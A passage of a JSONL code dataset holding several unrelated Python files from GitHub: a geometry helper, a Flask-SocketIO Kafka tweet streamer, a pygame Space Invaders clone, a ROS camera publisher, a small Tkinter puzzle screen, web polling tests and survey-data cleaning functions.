port_prims.append(new_prim)\n return port_prims\n\n\ndef gen_ports_from_window_ncp(\n wp: geom.Polygon, ncp: List[geom.Polygon]\n) -> List[geom.Polygon]:\n \"\"\"\n Generate ports polygons that encapsulate the window and NCP geometries.\n\n window and NCP geometries are rotated around +Z axis until\n the axis-aligned bounding box projected onto XY plane is\n the smallest, thus the systems are facing\n orthogonal direction. A boundary box is then generated with a slight\n outward offset. 
This boundary box is then rotated back the same amount\n to encapsulate the original window and NCP geomteries.\n \"\"\"\n wn = wp.normal\n if (abs(wn[1]) == 1) or (abs(wn[0]) == 1):\n ncp.append(wp)\n bbox = geom.getbbox(ncp, offset=0.00)\n bbox.remove([b for b in bbox if np.array_equal(b.normal * -1, wn)][0])\n return [b.move(wn * -0.1) for b in bbox]\n xax = [1, 0, 0]\n _xax = [-1, 0, 0]\n yax = [0, 1, 0]\n _yax = [0, -1, 0]\n zaxis = np.array((0, 0, 1))\n rm_pg = [xax, _yax, _xax, yax]\n area_list = []\n win_normals = []\n # Find axiel aligned rotation angle\n bboxes = []\n for deg in range(90):\n rad = math.radians(deg)\n win_polygon_r = wp.rotate(zaxis, rad)\n win_normals.append(win_polygon_r.normal)\n ncs_polygon_r = [p.rotate(zaxis, rad) for p in ncp]\n ncs_polygon_r.append(win_polygon_r)\n _bbox = geom.getbbox(ncs_polygon_r, offset=0.0)\n bboxes.append(_bbox)\n area_list.append(_bbox[0].area)\n # Rotate to position\n deg = area_list.index(min(area_list))\n rrad = math.radians(deg)\n bbox = bboxes[deg]\n _win_normal = [round(i, 1) for i in win_normals[deg].to_list()]\n del bbox[rm_pg.index(_win_normal) + 2]\n rotate_back = [pg.rotate(zaxis, rrad * -1) for pg in bbox]\n return rotate_back\n\n\ndef merge_windows(prims: Sequence[pr.Primitive]) -> pr.Primitive:\n \"\"\"Merge rectangles if coplanar.\"\"\"\n polygons = [geom.parse_polygon(p.fargs) for p in prims]\n normals = [p.normal for p in polygons]\n if len(set(normals)) > 1:\n raise ValueError(\"Windows not co-planar\")\n points = [i for p in polygons for i in p.vertices]\n hull_polygon = geom.convexhull(points, normals[0])\n modifier = prims[0].modifier\n identifier = prims[0].identifier\n new_prim = utils.polygon2prim(hull_polygon, modifier, identifier)\n return new_prim\n","repo_name":"LBNL-ETA/frads","sub_path":"frads/ncp.py","file_name":"ncp.py","file_ext":"py","file_size_in_byte":17697,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"33901732338","text":"import game\r\nimport board\r\n\r\nfrom threading import Thread\r\n\r\n# https://docs.python.org/3/library/threading.html\r\n# https://benedictwilkinsai.github.io/post/tkinter-mp/\r\n\r\nprint('test')\r\n\r\ngui_board = board.init_board(start=False)\r\ngame.board = board.Board(game.board)\r\ngame.board.attach_trigger(gui_board.set_board)\r\nthread = Thread(target=game.game)\r\nthread.start()\r\n\r\ngui_board.mainloop()\r\n ","repo_name":"milselarch/10-014","sub_path":"1D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16442976082","text":"from flask import Flask, request,jsonify\nfrom flask_socketio import SocketIO,emit\nfrom flask_cors import CORS\nimport json\n\nfrom kafka import KafkaConsumer, KafkaProducer\nfrom dotenv import load_dotenv, find_dotenv\nimport os\nfrom pathlib import Path\n\n\n\n# ========================== setup ==========================\n\ndotenv_path = Path('../../.env')\nload_dotenv(dotenv_path=dotenv_path)\n\n# =========================== app ===========================\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.getenv('REACT_SECRET_KEY')\nCORS(app,resources={r\"/*\":{\"origins\":\"*\"}}) # not smart with all origins? 
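\n# Editor sketch (hypothetical origin): scoping CORS to the known frontend is safer than \"*\",\n# e.g. CORS(app, resources={r\"/*\": {\"origins\": [\"http://localhost:3000\"]}})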
\nsocketio = SocketIO(app,cors_allowed_origins=\"*\")\n\n# ========================== emits ===========================\n\n\n\n# ========================== events ==========================\n@app.route(\"/http-call\")\ndef http_call():\n \"\"\"return JSON with string data as the value\"\"\"\n data = {'data':'This is a big dummy'}\n return jsonify(data)\n\n@socketio.on(\"connect\")\ndef connected():\n print(\"client has connected\")\n \n emit(\"connect\",{\"data\":f\"id: {request.sid} is connected\"})\n # This is where we change id:\n \n\n@socketio.on('data')\ndef handle_message(data):\n # Data reciever message, here deal with query parameters\n print(\"data from the front end: \",str(data))\n print(data)\n # Send response:\n emit(\"data\",{'data':data,'id':request.sid},broadcast=True)\n\n@socketio.on('query')\ndef handle_message(data):\n # Data reciever message, here deal with query parameters\n print(\"data from the front end: \",str(data))\n print(data)\n # Send response:\n emit(\"query\",{'data':data,'id':request.sid},broadcast=True)\n\n@socketio.on(\"disconnect\")\ndef disconnected():\n \"\"\"event listener when client disconnects to the server\"\"\"\n print(\"user disconnected\")\n emit(\"disconnect\",f\"user {request.sid} disconnected\",broadcast=True)\n\n@socketio.on('givedata')\ndef handle_message(data):\n def stream_tweets():\n consumer = KafkaConsumer(bootstrap_servers='127.0.0.1:9092')\n consumer.subscribe(topics=['tweets_implicit'])\n try:\n # this method should auto-commit offsets as you consume them.\n # If it doesn't, turn on logging.DEBUG to see why it gets turned off.\n # Not assigning a group_id can be one cause\n for msg in consumer:\n # TODO: process the kafka messages.\n msg = json.loads(msg.value.decode())\n yield msg\n finally:\n # Always close your producers/consumers when you're done\n consumer.close()\n # data2 = {'data':[\n # {\n # 'text':'#somebody',\n # 'count':5,\n # 'color':'green',\n # },\n # {\n # 'text':'#once',\n # 'count':4,\n # 'color':'green',\n # },\n # {\n # 'text':'#told me',\n # 'count':3,\n # 'color':'none',\n # },\n # {\n # 'text':'#the world',\n # 'count':3,\n # 'color':'none',\n # },\n # {\n # 'text':'#was gonna change me',\n # 'count':3,\n # 'color':'none',\n # },\n # {\n # 'text':'#HillaryForJerusalem',\n # 'count':3,\n # 'color':'none',\n # },\n # ]}\n # emit(\"tweets\", data2, broadcast=True)\n for tweet in stream_tweets():\n emit('tweets', {'data':tweet})\n\n# @socketio.on(\"tweet_view_explicit_day\")\n# def tweet_view_explicit_day():\n# # send dayview for explicit tweets\n# data = {data:['123', '142', '421', '124']}\n# emit(\"tweet_view_explicit_day\", {'data':jsonify(data),'id':request.sid}, broadcast=True)\n\n# @socketio.on(\"tweet_view_impicit_day\")\n# def tweet_view_explicit_day():\n# # send dayview for explicit tweets\n# data = ['123', '142', '421', '124']\n# emit(\"tweet_view_implicit_day\", {'data':data,'id':request.sid}, broadcast=True)\nif __name__ == '__main__':\n socketio.run(app, debug=True,port=5001)","repo_name":"snorrealv/info319_semester_assignment","sub_path":"web/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21107043238","text":"import sys, random, math\nimport pygame\nimport pygame_gui\nimport pickle as P\n#Made Classes/Files\nimport PRPGD\nimport MainMenuGUI as MMGUI\nfrom interpolator import *\nimport VisualSprites as VS\nimport UtilityClasses as UC\n#import VisualSprites as 
VS\n\n#Constants\nGAMESTATE = 'MAIN_MENU'\nSCREENRECT = pygame.Rect(0,0,600,800)\nFIRE = 5\n#define our sprite groups and add them into super constructors to initiate\nall = pygame.sprite.RenderUpdates()\nshots = pygame.sprite.Group()\nenemies = pygame.sprite.Group()\nMenu = pygame.sprite.Group()\nenemyshots = pygame.sprite.Group()\nplayerG = pygame.sprite.Group()\nVsprites = pygame.sprite.Group()\nUsprites = pygame.sprite.Group()\n\npygame.init()\nclock = pygame.time.Clock()\n#custom user event with timer\nSpawnNow = pygame.event.Event(pygame.USEREVENT + 1)\npygame.time.set_timer(SpawnNow,3000,5)\n#Enemy Shot timer\nShoot = pygame.event.Event(pygame.USEREVENT + 2)\npygame.time.set_timer(Shoot, 500)\n#Get current MS\n#GUI Manager\nscreen = pygame.display.set_mode(SCREENRECT.size)\n\nmanager = pygame_gui.UIManager((SCREENRECT.size), 'MainTheme.json')\n#GUi element\nspawn_button = pygame_gui.elements.UIButton(relative_rect=pygame.Rect((0, 0), (100, 50)),text='Spawn Enemey',manager=manager)\n\n#Init classes\n\nclass Player(pygame.sprite.Sprite):\n #Base player class that handles movement and a method for getting the objects pos(gunpos)\n speed = 5\n images = ''\n health_capacity = 100\n current_health = health_capacity\n\n def __init__(self):\n super().__init__(all,playerG)\n self.rpgData = PRPGD.RPGData()\n self.rpgData.Health = self.health_capacity\n self.image = self.images\n self.rect = self.image.get_rect(midbottom=(300,780))\n self.reloading = 0\n self.HealthBar = pygame_gui.elements.ui_screen_space_health_bar.UIScreenSpaceHealthBar(relative_rect=pygame.Rect((10,780),(100,20)),\n manager=manager,sprite_to_monitor=Player)\n self.TotalScoreLabel = pygame_gui.elements.ui_label.UILabel(relative_rect=pygame.Rect((450,10),(150,20)),text=('Total Score: ' + str(self.rpgData.getTotalScore())),manager=manager)\n self.CoinLabel = pygame_gui.elements.ui_label.UILabel(relative_rect=pygame.Rect((450,30),(150,20)),text=('$$$: ' + str(self.rpgData.Coins)),manager=manager)\n\n def Move(self, direction):\n self.rect.x += (direction * self.speed)\n if self.rect.left < 0:\n self.rect.right=(600)\n elif self.rect.right > 600:\n self.rect.left=(0)\n\n\n def gunpos(self):\n pos = self.rect.midtop\n return pos\n\n def sethealth_capacity(self,new_hc, new_cc):\n self.health_capacity = new_hc\n\nclass Shot(pygame.sprite.Sprite):\n\n images = ''\n\n def __init__(self,pos):\n super().__init__(all,shots)\n self.image = self.images\n self.rect = self.image.get_rect(midbottom = pos)\n\n def update(self):\n self.rect.move_ip(0,-10)\n if self.rect.y <= 0:\n self.kill()\n\nclass EnemyShot(pygame.sprite.Sprite):\n\n images = ''\n\n def __init__(self,pos):\n super().__init__(all,enemyshots)\n self.image = self.images\n self.rect = self.image.get_rect(midbottom = pos)\n\n def update(self):\n self.rect.move_ip(0,10)\n if self.rect.y >= 800:\n self.kill()\n\n\nclass Enemy(pygame.sprite.Sprite):\n images = ''\n startdirection = 1\n damage = 10\n\n def __init__(self,hp):\n super().__init__(all,enemies)\n self.image = self.images\n self.rect = self.image.get_rect()\n self.rect.x = random.randint(100,500)\n self.rect.y = 100\n self.directionX = random.choice([-1,1])\n self.directionY = 0\n self.LastDirY = 0\n self.HP = hp\n self.Fire = 5\n self.Score = 5\n\n\n def gunpos(self):\n pos = self.rect.midbottom\n return pos\n\n def update(self):\n if self.rect.y < 100:\n self.directionY = 1\n self.rect.move_ip(0,1 * self.directionY)\n self.directionY = 0\n self.LastDirY = self.rect.y\n\n elif self.directionY > 0:\n if self.rect.y < 
(self.LastDirY + 24):\n self.rect.move_ip(0,1*self.directionY)\n elif self.rect.y == self.LastDirY + 24:\n self.directionY = 0\n\n elif self.directionX > 0:\n self.rect.move_ip(1*self.directionX,0)\n if self.rect.right > 600:\n self.directionX = -1\n self.directionY = 1\n self.LastDirY = self.rect.y\n\n elif self.directionX < 0:\n self.rect.move_ip(1 * self.directionX,0)\n if self.rect.left < 0:\n self.directionX = 1\n self.directionY = 1\n self.LastDirY = self.rect.y\n\n self.rect = self.rect.clamp(SCREENRECT)\n\n if len(playerG.sprites()) == 0:\n self.kill()\n if self.HP <= 1:\n self.image = pygame.image.load('Images\\EnemyImages\\\\ufo2.png')\n\nclass Spawner():\n def __init__(self, Amount):\n self.Amount = Amount\n self.SpawnEvent = pygame.event.Event(pygame.USEREVENT + 3)\n self.SpawnTimer = pygame.time.set_timer(self.SpawnEvent,5000,0)\n self.offsetCount = 0\n\n\n def SpawnBaseEnemy(self):\n self.offsetCount = 0\n for enemy in range(self.Amount):\n spawnE = Enemy(4)\n spawnE.rect.x = (((screen.get_width() - (self.Amount*32)) // 2) + (32*self.offsetCount))\n spawnE.rect.y = -10\n self.offsetCount += 1\n\n\nclass Background():\n def __init__(self):\n self.bgimage = pygame.image.load('Images\\\\BackgroundImages\\Space Background.png')\n self.rectBGimg = self.bgimage.get_rect()\n self.bgY1 = 0\n self.bgX1 = 0\n self.bgY2 = self.rectBGimg.height\n self.bgX2 = 0\n self.moving_speed = 1\n\n def update(self):\n self.bgY1 -= self.moving_speed\n self.bgY2 -= self.moving_speed\n if self.bgY1 <= -self.rectBGimg.height:\n self.bgY1 = self.rectBGimg.height\n if self.bgY2 <= -self.rectBGimg.height:\n self.bgY2 = self.rectBGimg.height\n\n\n def render(self):\n screen.blit(self.bgimage, (self.bgX1, self.bgY1))\n screen.blit(self.bgimage, (self.bgX2, self.bgY2))\n\n\ndef main():\n #setup main screen\n screen = pygame.display.set_mode(SCREENRECT.size)\n surface = pygame.Surface(screen.get_size())\n #initialize the screen extras\n pygame.display.set_caption('Space Invaders Test 2')\n pygame.display.set_icon(pygame.image.load('SpaceInvadersLogo.png'))\n\n #setup and display the background\n back_ground = Background()\n pygame.display.flip()\n\n #Load and prepare images\n Player.images = pygame.image.load('Images\\PlayerImages\\PlayerImg.png')\n Shot.images = pygame.image.load('Images\\ProjectileImages\\\\bullet.png')\n EnemyShot.images = pygame.image.load('Images\\ProjectileImages\\\\bomb.png')\n Enemy.images = pygame.image.load('Images\\EnemyImages\\\\ufo.png')\n\n\n menu = MMGUI.MAINMENU(manager,Menu)\n menu.PrePlayScreen()\n\n #create pre play screen and init starting sprites\n while menu.gamestate == 'Main Menu':\n time_delta = clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n elif event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == menu.PlayButton:\n menu.gamestate = 'Play'\n menu.KillPrePlayMenu()\n if event.ui_element == menu.Quit:\n return\n if event.ui_element == menu.LoadGame:\n menu.KillPrePlayMenu()\n menu.LoadScreen()\n if event.ui_element == menu.BackButton:\n if menu.LoadPanel != None:\n menu.KillLoadScreen()\n menu.PrePlayScreen()\n\n\n back_ground.update()\n back_ground.render()\n manager.process_events(event)\n manager.update(time_delta)\n manager.draw_ui(screen)\n pygame.display.update()\n\n StatMenuOpen = False\n paused = False\n player = Player()\n spawner = Spawner(3)\n\n #Main play while loop when paused\n while menu.gamestate == 'Play':\n time_delta = clock.tick(60)\n for event in 
pygame.event.get():\n\n if event.type == pygame.QUIT:\n return\n #User Events for retry menu\n if event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == spawn_button:\n print('SpawnPressed')\n if event.ui_element == menu.PlayAgain:\n menu.MenuPanel.kill()\n Player.current_health = Player.health_capacity\n main()\n if event.ui_element == menu.Quit:\n return\n\n elif event.ui_element == menu.ResumeButton and hasattr(menu, 'ResumeButton'):\n paused = not paused\n menu.KillPauseScreen()\n #Stat Menu Button Events\n elif event.ui_element == player.rpgData.DamageButton and hasattr(player.rpgData, 'DamageButton'):\n if player.rpgData.StatPoints >= 1:\n player.rpgData.Damage += 1\n player.rpgData.StatPoints -= 1\n player.rpgData.DamageLabel.set_text('Damage Bonus: ' + str(player.rpgData.Damage))\n player.rpgData.StatPointsLabel.set_text('Stat Points: ' + str(player.rpgData.StatPoints))\n\n elif event.ui_element == player.rpgData.HealthButton and player.rpgData.StatPoints >= 1:\n player.rpgData.Health += 1\n player.health_capacity += 1\n player.current_health += 1\n player.HealthBar = pygame_gui.elements.ui_screen_space_health_bar.UIScreenSpaceHealthBar(relative_rect=pygame.Rect((10,780),(100,20)),\n manager=manager,sprite_to_monitor=player)\n player.rpgData.StatPoints -= 1\n player.rpgData.HealthLabel.set_text('Health Bonus: '+ str(player.rpgData.Health))\n player.rpgData.StatPointsLabel.set_text('Stat Points: ' + str(player.rpgData.StatPoints))\n\n elif event.ui_element == player.rpgData.LifeLeechButton and player.rpgData.StatPoints >= 1:\n player.rpgData.LifeLeech += 1\n player.rpgData.StatPoints -= 1\n player.rpgData.LifeLeechLabel.set_text('Life Leech Bonus: ' + str(player.rpgData.LifeLeech))\n player.rpgData.StatPointsLabel.set_text('Stat Points: ' + str(player.rpgData.StatPoints))\n\n elif player.rpgData.StatPoints <= 0:\n player.rpgData.DamageButton.disable()\n player.rpgData.HealthButton.disable()\n player.rpgData.LifeLeechButton.disable()\n\n #Global enemy fire event\n if event.type == pygame.USEREVENT + 2:\n #sprite_list = enemies.sprites()\n for enemy in enemies.sprites():\n enemy.Fire = random.randint(0,10)\n if enemy.Fire == FIRE:\n EnemyShot(enemy.gunpos())\n\n #Spawner Event\n if event.type == pygame.USEREVENT+3 and paused == False:\n spawner.SpawnBaseEnemy()\n\n #Pause and Stat Menu\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE and paused == True and StatMenuOpen == False:\n menu.KillPauseScreen()\n paused = not paused\n\n elif event.key == pygame.K_ESCAPE and paused == True and StatMenuOpen == True:\n player.rpgData.KillStatMenu()\n paused = False\n StatMenuOpen = False\n\n elif event.key == pygame.K_ESCAPE and paused == False and StatMenuOpen == True:\n player.rpgData.KillStatMenu()\n menu.PauseMenu()\n paused = not paused\n StatMenuOpen = False\n\n elif event.key == pygame.K_ESCAPE and paused == False and StatMenuOpen == False:\n menu.PauseMenu()\n paused = True\n\n\n\n if event.key == pygame.K_l and StatMenuOpen == False:\n if hasattr(menu,'PausePanel'):\n menu.KillPauseScreen()\n\n statMenu = player.rpgData.StatMenu(manager,player.rpgData)\n if player.rpgData.StatPoints <= 0:\n player.rpgData.DamageButton.disable()\n player.rpgData.HealthButton.disable()\n player.rpgData.LifeLeechButton.disable()\n StatMenuOpen = True\n paused = True\n\n elif event.key == pygame.K_l and StatMenuOpen == True:\n player.rpgData.KillStatMenu()\n StatMenuOpen = False\n paused = False\n\n manager.process_events(event)\n 
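# editor note: pygame_gui's usual loop order is manager.update(time_delta) before manager.draw_ui(screen)\n            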
manager.draw_ui(screen)\n manager.update(time_delta)\n player.HealthBar.redraw()\n pygame.display.update()\n if paused == True:\n continue\n\n else:\n #Main while loop when not paused\n manager.process_events(event)\n manager.update(time_delta)\n\n all.clear(screen,surface)\n all.update()\n\n\n keystate = pygame.key.get_pressed()\n direction = keystate[pygame.K_RIGHT] - keystate[pygame.K_LEFT]\n player.Move(direction)\n fireing = keystate[pygame.K_SPACE]\n if not player.reloading and fireing:\n shot = Shot(player.gunpos())\n player.reloading = fireing\n #Collision detection\n\n #Enemy for player shots\n for enemy in pygame.sprite.groupcollide(enemies,shots,0,1).keys():\n hitNumber = UC.HitNumbers(enemy,player,True,all,Usprites)\n if enemy.HP > abs((enemy.HP - player.rpgData.getDamage())):\n #player.rpgData.XPDamage(player.rpgData.getDamage(),enemy.HP)\n enemy.HP -= player.rpgData.getDamage()\n #print('Level:',player.rpgData.getPlayerLevel(),'CurrentXP:',player.rpgData.getCurrentXP(),'XPNeeded:',player.rpgData.getXPNeeded())\n if enemy.HP <= 0:\n player.rpgData.TotalScore += enemy.Score\n player.rpgData.XPforScore(enemy.Score)\n #print('Level:',player.rpgData.getPlayerLevel(),'CurrentXP:',player.rpgData.getCurrentXP(),'XPNeeded:',player.rpgData.getXPNeeded())\n enemy.kill()\n #print(\"Total Score:\",player.rpgData.TotalScore)\n player.TotalScoreLabel.set_text(\"Total Score:\" + str(player.rpgData.TotalScore))\n coinS = VS.CoinSprite(enemy,all,Vsprites,player)\n explosion = VS.Explosion(all,Vsprites,enemy)\n HitNumber = UC.HitNumbers(enemy, player, False, all, Vsprites)\n\n else:\n player.rpgData.XPforScore(enemy.Score)\n player.rpgData.TotalScore += enemy.Score\n enemy.kill()\n player.TotalScoreLabel.set_text(\"Total Score:\" + str(player.rpgData.TotalScore))\n coinS = VS.CoinSprite(enemy,all,Vsprites,player)\n explosion = VS.Explosion(all,Vsprites,enemy)\n hitNumber = UC.HitNumbers(enemy, player, False, all, Usprites)\n\n if player.current_health < player.health_capacity:\n vampS = VS.VampSprite(enemy,all,Vsprites,player)\n \n #Player for enemy shots\n for player in pygame.sprite.groupcollide(playerG, enemyshots,0,1).keys():\n player.current_health -= Enemy.damage\n player.HealthBar = pygame_gui.elements.ui_screen_space_health_bar.UIScreenSpaceHealthBar(relative_rect=pygame.Rect((10,780),(100,20)),\n manager=manager,sprite_to_monitor=player)\n print(player.current_health)\n if player.current_health <= 0:\n player.kill()\n #menu.gamestate = 'Retry'\n menu.RetryScreen()\n\n #VisualSprites\n for sprite in pygame.sprite.groupcollide(Vsprites, playerG,1,0).keys():\n if type(sprite) == type(coinS):\n player.rpgData.Coins += 1\n player.CoinLabel.set_text('$$$:' + str(player.rpgData.Coins))\n print('Coin')\n elif type(sprite) == type(vampS):\n if player.current_health result:\n result = counter\nprint(result)\n\n\n# 4\n# - . - . - -\n# . - . . - .\n# . - - - - -\n# - - - . 
- -","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Dots.py","file_name":"Dots.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"11015702022","text":"# -*- coding: utf-8 -*- \n'''\n 可视化颜色阈值调参软件\n'''\n\nimport cv2\nimport numpy as np\nimport sys\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\n\n\ndef detectCircle():\n\n pub_Img = rospy.Publisher('circle/image', Image, queue_size=1) \n rospy.init_node('detectCircle', anonymous=True)\n rate = rospy.Rate(30)\n bridge = CvBridge()\n # 读入视频流\n cap = cv2.VideoCapture(0)\n \n while(True):\n # 逐帧获取画面\n # ret ? 画面是否获取成功\n ret, frame = cap.read()\n \n if ret:\n img = frame\n # img2 = cv2.resize(img,(160,120))\n pub_Img.publish(bridge.cv2_to_imgmsg(img, '8UC3'))\n # cv2.imshow('img',img)\n #cv2.imshow('canny',canny_img)\n\n else:\n print(\"视频读取完毕或者视频路径异常\")\n break\n\n # 这里做一下适当的延迟,每帧延时0.1s钟\n if cv2.waitKey(30) & 0xFF == ord('q'):\n break\n\n # 释放资源\n cap.release()\n #cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n detectCircle()\n","repo_name":"dawnchen123/autoFlight","sub_path":"src/autoControl/pubCam.py","file_name":"pubCam.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74894528487","text":"import sys\nimport types\n\nimport evtimer\nimport utils.framers.ieee80211.evframes80211 as evframes80211\nimport evrequest\n#sys.path = sys.path + ['..']\n\n\n\ndef mkevent(nickname, **kwargs):\n '''Returns an event of the given event nickname.\n\n @param nickname: a valid event nickname, i.e. one that is a key in dictionary of valid nicknames.\n @param kwargs: a dictionary of variables depending on the type of event. 
Field C{ev_dc} is a dictionary of fields and values for the corresponding event type; field C{frmpkt} is a binary packed frame.\n    @return: an Event object.\n    '''\n\n    from evtimer import dc_nicknames as ev_dc_nicknames\n    import utils.framers.ieee80211.evframes80211\n    import evrequest\n\n    frmpkt, ev_dc = '', {}\n    if kwargs.has_key('ev_dc'):\n        ev_dc = kwargs['ev_dc']\n    if kwargs.has_key('frmpkt'):\n        frmpkt = kwargs['frmpkt']\n        ev_dc['frame_length'] = len(frmpkt)\n    else:\n        ev_dc['frame_length'] = 0\n        frmpkt = ''\n    if kwargs.has_key('payload'):\n        payload = kwargs['payload']\n    else:\n        payload = ''\n    if evtimer.dc_nicknames.has_key(nickname):\n        ptype, psubtype, eventclass = evtimer.dc_nicknames[nickname]\n        return eventclass(nickname, ptype, psubtype, ev_dc) \n    elif evframes80211.dc_nicknames.has_key(nickname):\n        ev_type, ev_subtype, eventclass = evframes80211.dc_nicknames[nickname]\n        ev = eventclass(nickname, ev_type, ev_subtype, frmpkt, ev_dc)\n        ev.payload = payload\n        return ev\n    elif evrequest.dc_nicknames.has_key(nickname):\n        ptype, psubtype, eventclass = evrequest.dc_nicknames[nickname]\n        return eventclass(nickname, ptype, psubtype, ev_dc) \n    else:\n        raise EventNameException(nickname + ' is not a valid nickname.')\n\n\n\n\n\nif __name__ == '__main__':\n    import doctest\n    doctest.testmod()\n\n\n\",\"repo_name\":\"git-artes/GNUWiNetwork\",\"sub_path\":\"gwn/gwnevents/api_events.py\",\"file_name\":\"api_events.py\",\"file_ext\":\"py\",\"file_size_in_byte\":1854,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":1,\"dataset\":\"github-code\",\"pt\":\"53\"} +{\"seq_id\":\"26904891803\",\"text\":\"__contact__ = \"thedominusweb@gmail.com\"\r\n\r\nimport socket\r\nimport os\r\nimport base64  # editor fix: used by base64.b64decode below but was missing from the imports\r\nfrom threading import Thread\r\nfrom Tkinter import *\r\nfrom PIL import ImageTk, Image\r\n\r\nmsg = \"dGhlZG9taW51c3dlYi5vbmxpbmUvdW5kZXJncm91bmQvc2V2aXllMi9zZXZpeWUzZXJpc2ltLnBocA==\"\r\nbase64_bytes = msg.encode('ascii')\r\nmsg_bytes = base64.b64decode(base64_bytes)\r\ndecoded_msg = msg_bytes.decode('ascii')\r\n\r\ndef command_clear():\r\n    if os.name==\"nt\":\r\n        os.system('cls')\r\n    elif os.name==\"posix\":\r\n        os.system('clear')\r\n\r\ndef printit():\r\n    pencere.destroy()\r\n    pencere2 = Tk()\r\n    pencere2.title('Seviye3')\r\n    pencere2.configure(background='black')\r\n    pencere2.geometry('750x600')\r\n    w = Label(pencere2, text=msg)\r\n    w.pack()\r\n    ws = Label(pencere2, text=\"Capture the Flag\")\r\n    ws.pack()\r\n    \r\n\r\npencere = Tk()\r\npencere.title('Seviye3')\r\npencere.configure(background='black')\r\npencere.geometry('750x600')\r\nimg = ImageTk.PhotoImage(Image.open(\"generatedtext.png\"))\r\nimg_label = Label(pencere, image=img)\r\nimg_label.pack()\r\nB = Button(pencere, text =\"Click Me\", command = printit)\r\nB.pack()\r\npencere.mainloop()\r\n\r\ncommand_clear()\r\n\",\"repo_name\":\"thedominusweb/seviye3erisim\",\"sub_path\":\"seviye3.py\",\"file_name\":\"seviye3.py\",\"file_ext\":\"py\",\"file_size_in_byte\":1123,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":0,\"dataset\":\"github-code\",\"pt\":\"53\"} +{\"seq_id\":\"27037048705\",\"text\":\"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nfrom urllib.request import urlopen\nimport json\nimport time\n\nclass tests:\n    def __init__(self,gnt_url,getad_url):\n        #global driver\n        self.gnt_url=gnt_url\n        self.getad_url=getad_url\n\n\n\n    # def create_new_camp_from_gui(self):\n    #     driver.get(self.gui_url)\n    #     driver.maximize_window()\n    #     driver.find_element_by_id(\"textfield1\").send_keys(self.gui_user_name)\n    #     driver.find_element_by_id(\"textfield4\").send_keys(self.password)\n    # 
driver.find_element_by_id(\"target\").click()\n # driver.find_element_by_id(\"btnNewCampaign\").click()\n # select =Select(driver.find_element_by_css_selector(\"[ng-model^=PlatformType]\"))\n # select.select_by_value('Desktop')\n # driver.find_element_by_xpath(\"//*[contains(text(), 'Bidding')]\").click()\n # driver.find_element_by_xpath(\"//*[contains(text(), 'Choose Product')]\").click()\n # driver.find_element_by_xpath(\"//*[contains(text(), 'eRoll')]\").click()\n\n def check_get_ad(self):\n get_ad_works=False\n for i in range (0,35):\n time.sleep(5)\n response = urlopen(self.getad_url)\n string = response.read().decode('utf-8')\n if \"Ad id=\" not in string:\n print (\"Get-Ad is not have Campaign inside- trying again \")\n continue\n else:\n get_ad_works=True\n print (\"Get-Ad works!\")\n break\n return get_ad_works\n\n\n def check_gnt(self):\n gnt_works=False\n for i in range (0,35):\n time.sleep(5)\n response = urlopen(self.gnt_url)\n string = response.read().decode('utf-8')\n if \"Sucsess\" not in string:\n print (\"GNT is not have Campaign inside- trying again \")\n continue\n else:\n gnt_works=True\n print (\"GNT works!\")\n break\n return gnt_works\n\n\n\n\n# liron=tests('http://staging3.advsnx.net/index.html','http://staging3.advsnx.net/asa/admin/login.aspx','bobo123','Admin1','tmf','C:\\\\chromedriver.exe')\n# liron.check_get_ad()\n# liron.check_gnt()\n# liron.create_new_camp_from_gui()\n\n\n\n\n","repo_name":"LironBenEzra/versionAutomation","sub_path":"Progect/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3594094182","text":"\"\"\"Functions for applying complete case missingness correction to\nUnderstanding Society data.\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nimport US_utils\n\ndef complete_case(data):\n \"\"\" main function for complete case.\n Parameters\n ----------\n data : pd.DataFrame\n US data to perform complete case correction on.\n Returns\n -------\n data : pd.DataFrame\n Corrected data.\n \"\"\"\n data = data.replace(US_utils.missing_types, np.nan)\n data = data.dropna(axis=0)\n return data\n\n\ndef complete_case_varlist(data, varlist):\n \"\"\" Function for complete case only on specific vars (from varlist).\n Parameters\n ----------\n data : pd.DataFrame\n US data to perform complete case correction on.\n varlist : list\n List of variables for which to perform complete case on\n Returns\n -------\n data : pd.DataFrame\n Corrected data.\n \"\"\"\n for var in varlist:\n data[var] = data[var].replace(US_utils.missing_types, np.nan)\n data = data.dropna(axis=0, subset=[var])\n\n #data[varlist] = data[varlist].replace(US_utils.missing_types, np.nan)\n\n #data = data.dropna(axis=0)\n data = data.reset_index(drop=True)\n return data\n\n\ndef complete_case_custom_years(data, var, years):\n\n # Replace all missing values in years (below 0) with NA, and drop the NAs\n data[var][data['time'].isin(years)] = data[var][data['time'].isin(years)].replace(US_utils.missing_types, np.nan)\n data = data[~(data['time'].isin(years) & data[var].isna())]\n\n return data\n\n\nif __name__ == \"__main__\":\n\n years = np.arange(2009, 2020)\n file_names = 